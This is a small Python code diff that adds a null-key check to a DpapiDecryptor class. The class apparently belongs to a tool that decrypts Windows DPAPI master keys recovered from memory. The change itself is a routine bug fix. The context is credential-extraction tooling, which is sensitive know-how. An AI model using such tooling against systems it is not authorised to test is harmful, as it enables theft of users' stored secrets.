@@ -50,7 +50,9 @@ class DpapiDecryptor(PackageDecryptor):
 		return ptr_entry, ptr_entry_loc
 		
 	async def add_entry(self, dpapi_entry):
-		
+		if dpapi_entry.key is None:
+			return
+			
 		if dpapi_entry and dpapi_entry.keySize > 0: #and dpapi_entry.keySize % 8 == 0:
 			dec_masterkey, raw_dec = self.decrypt_password(dpapi_entry.key, bytes_expected = True)
 			sha_masterkey = hashlib.sha1(dec_masterkey).hexdigest()
